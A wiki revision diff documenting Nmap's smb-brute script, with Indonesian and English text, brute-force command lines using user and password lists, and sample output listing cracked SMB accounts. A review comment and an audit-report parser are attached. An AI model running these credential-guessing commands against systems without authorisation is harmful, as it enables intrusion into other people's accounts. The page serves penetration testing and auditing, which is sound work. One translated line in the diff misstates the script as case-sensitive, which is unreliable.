Difference between revisions of "Nmap: brute force hack smb password"

From OnnoWiki
(New page: Source: https://nmap.org/nsedoc/scripts/smb-brute.html ==File smb-brute== Script types: hostrule Categories: intrusive, brute Download: http://nmap.org/svn/scripts/smb-brute.nse ==User ...)
 
 
(7 intermediate revisions by the same user not shown)
Line 3: Line 3:
 
==File smb-brute==
 
==File smb-brute==
  
Script types: hostrule
+
Script types: hostrule
Categories: intrusive, brute
+
Categories: intrusive, brute
Download: http://nmap.org/svn/scripts/smb-brute.nse
+
Download: http://nmap.org/svn/scripts/smb-brute.nse
  
 
==User Summary==
 
==User Summary==
  
Attempts to guess username/password combinations over SMB, storing discovered combinations for use in other scripts. Every attempt will be made to get a valid list of users and to verify each username before actually using them. When a username is discovered, besides being printed, it is also saved in the Nmap registry so other Nmap scripts can use it. That means that if you're going to run smb-brute.nse, you should run other smb scripts you want. This checks passwords in a case-insensitive way, determining case after a password is found, for Windows versions before Vista.
+
Upaya untuk menebak kombinasi username / password dari SMB, menyimpan kombinasi ditemukan untuk digunakan dalam skrip lainnya. Setiap upaya akan dilakukan untuk mendapatkan daftar valid dari pengguna dan untuk memverifikasi setiap nama pengguna sebelum benar-benar menggunakan mereka. Ketika nama pengguna ditemukan, selain dicetak, juga disimpan dalam registri Nmap skrip sehingga Nmap lainnya dapat menggunakannya. Itu berarti bahwa jika kita akan menjalankan smb-brute.nse, kita harus menjalankan skrip smb lain yang kita inginkan. Script ini memeriksa password dengan secara case-sensitive, menentukan kasus setelah password ditemukan, untuk Windows versi sebelum Vista.
  
This script is specifically targeted towards security auditors or penetration testers. One example of its use, suggested by Brandon Enright, was hooking up smb-brute.nse to the database of usernames and passwords used by the Conficker worm (the password list can be found at http://www.skullsecurity.org/wiki/index.php/Passwords, among other places. Then, the network is scanned and all systems that would be infected by Conficker are discovered.
+
==Contoh Penggunaan==
 
 
 
 
 
 
==Example Usage==
 
  
 
  nmap --script smb-brute.nse -p445 <host>
 
  nmap --script smb-brute.nse -p445 <host>
 
  sudo nmap -sU -sS --script smb-brute.nse -p U:137,T:139 <host>
 
  sudo nmap -sU -sS --script smb-brute.nse -p U:137,T:139 <host>
 +
Nmap –p445 –script smb-brute.nse –script-args userdb=user.txt,passdb=pass.txt 192.168.1.105
  
==Script Output==
+
contoh
  
  Host script results:
+
  nmap --script smb-brute.nse -p445 192.168.0.7
  | smb-brute:
+
  nmap --script smb-brute.nse -p445 192.168.0.80
  |  bad name:test => Valid credentials
+
  nmap -sU -sS --script smb-brute.nse -p U:137,T:139 192.168.0.80
|  consoletest:test => Valid credentials, password must be changed at next logon
+
  Nmap –p445 –script smb-brute.nse –script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.105
|  guest:<anything> => Valid credentials, account disabled
 
  |  mixcase:BuTTeRfLY1 => Valid credentials
 
|  test:password1 => Valid credentials, account expired
 
|  this:password => Valid credentials, account cannot log in at current time
 
|  thisisaverylong:password => Valid credentials
 
|  thisisaverylongname:password => Valid credentials
 
|  thisisaverylongnamev:password => Valid credentials
 
|_  web:TeSt => Valid credentials, account disabled
 
  
 +
==Contoh Output==
  
 +
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-02-11 06:01 WIB
 +
Nmap scan report for 192.168.0.7
 +
Host is up (0.0045s latency).
 +
Not shown: 989 closed ports
 +
PORT      STATE SERVICE
 +
22/tcp    open  ssh
 +
80/tcp    open  http
 +
139/tcp  open  netbios-ssn
 +
443/tcp  open  https
 +
445/tcp  open  microsoft-ds
 +
873/tcp  open  rsync
 +
8873/tcp  open  dxspider
 +
9001/tcp  open  tor-orport
 +
9050/tcp  open  tor-socks
 +
9090/tcp  open  zeus-admin
 +
22939/tcp open  unknown
 +
MAC Address: 4C:E6:76:1F:15:4C (Buffalo)
 +
 +
Host script results:
 +
| smb-brute:
 +
|  derry:123456789 => Valid credentials
 +
|  onno:123456789 => Valid credentials
 +
|_  reza:123456789 => Valid credentials
 +
 +
Nmap done: 1 IP address (1 host up) scanned in 132.91 seconds
  
 
==Referensi==
 
==Referensi==
  
 
* https://nmap.org/nsedoc/scripts/smb-brute.html
 
* https://nmap.org/nsedoc/scripts/smb-brute.html
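
Review bot: In the translated User Summary, the added text says the script checks passwords "secara case-sensitive", while the English paragraph it replaces says "case-insensitive ... for Windows versions before Vista"; the translation should say case-insensitive, otherwise the clause about determining case after a password is found does not follow. The two added userdb=/passdb= command lines are typed with en dashes (–p445 –script –script-args) and a capitalised Nmap, so they fail when pasted into a shell; write them as nmap -p445 --script smb-brute.nse --script-args with ASCII hyphens. The revision also drops the paragraph saying the script is aimed at security auditors and penetration testers, and the sample output listing account states (disabled, expired, password must be changed); consider keeping both in translation.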

Latest revision as of 10:12, 23 April 2020

Source: https://nmap.org/nsedoc/scripts/smb-brute.html

File smb-brute

Script types: hostrule
Categories: intrusive, brute
Download: http://nmap.org/svn/scripts/smb-brute.nse

User Summary

Attempts to guess username/password combinations over SMB, storing discovered combinations for use in other scripts. Every attempt is made to get a valid list of users and to verify each username before actually using it. When a username is discovered, besides being printed, it is also saved in the Nmap registry so other Nmap scripts can use it. That means that if you are going to run smb-brute.nse, you should also run the other smb scripts you want. The script checks passwords in a case-insensitive way, determining case after a password is found, for Windows versions before Vista.

Example Usage

nmap --script smb-brute.nse -p445 <host>
sudo nmap -sU -sS --script smb-brute.nse -p U:137,T:139 <host>
nmap -p445 --script smb-brute.nse --script-args userdb=user.txt,passdb=pass.txt 192.168.1.105

Example

nmap --script smb-brute.nse -p445 192.168.0.7
nmap --script smb-brute.nse -p445 192.168.0.80
nmap -sU -sS --script smb-brute.nse -p U:137,T:139 192.168.0.80
nmap -p445 --script smb-brute.nse --script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.105

Example Output

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-02-11 06:01 WIB
Nmap scan report for 192.168.0.7
Host is up (0.0045s latency).
Not shown: 989 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
139/tcp   open  netbios-ssn
443/tcp   open  https
445/tcp   open  microsoft-ds
873/tcp   open  rsync
8873/tcp  open  dxspider
9001/tcp  open  tor-orport
9050/tcp  open  tor-socks
9090/tcp  open  zeus-admin
22939/tcp open  unknown
MAC Address: 4C:E6:76:1F:15:4C (Buffalo)

Host script results:
| smb-brute: 
|   derry:123456789 => Valid credentials
|   onno:123456789 => Valid credentials
|_  reza:123456789 => Valid credentials 

Nmap done: 1 IP address (1 host up) scanned in 132.91 seconds
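
For an audit report, the smb-brute block in the output above can be parsed into a remediation list that names the affected accounts without echoing the guessed passwords, and that flags accounts sharing one password. This is an added example, not part of the original page or of Nmap; the function names are hypothetical and the sample text is constructed from the output shown above.

```python
import re
from collections import defaultdict

# Constructed sample: the relevant lines of the example output above.
SAMPLE = """\
Nmap scan report for 192.168.0.7
Host script results:
| smb-brute:
|   derry:123456789 => Valid credentials
|   onno:123456789 => Valid credentials
|_  reza:123456789 => Valid credentials
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
# "|   user:password => status"; the last line of a script block starts with "|_".
CRED_RE = re.compile(r"^\|_?\s+(?P<user>[^:]+):(?P<pw>.*?) => (?P<status>.+?)\s*$")


def parse_smb_brute(text):
    """Return one dict (host, user, pw, status) per smb-brute result line."""
    findings, host, in_block = [], None, False
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host, in_block = m.group(1), False
        elif line.startswith("| smb-brute:"):
            in_block = True
        elif in_block:
            m = CRED_RE.match(line)
            if m:
                findings.append({"host": host, **m.groupdict()})
            if not m or line.startswith("|_"):
                in_block = False  # block ended
    return findings


def remediation_report(findings):
    """Group accounts per host by shared password; the password is not output."""
    groups = defaultdict(list)
    for f in findings:
        groups[(f["host"], f["pw"])].append(f["user"])
    return [
        {"host": host, "users": sorted(users), "password_length": len(pw),
         "digits_only": pw.isdigit(), "shared": len(users) > 1}
        for (host, pw), users in groups.items()
    ]
```

Run over the sample, the report contains one group for 192.168.0.7: three accounts sharing a nine-character, digits-only password, all of which need a reset.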

References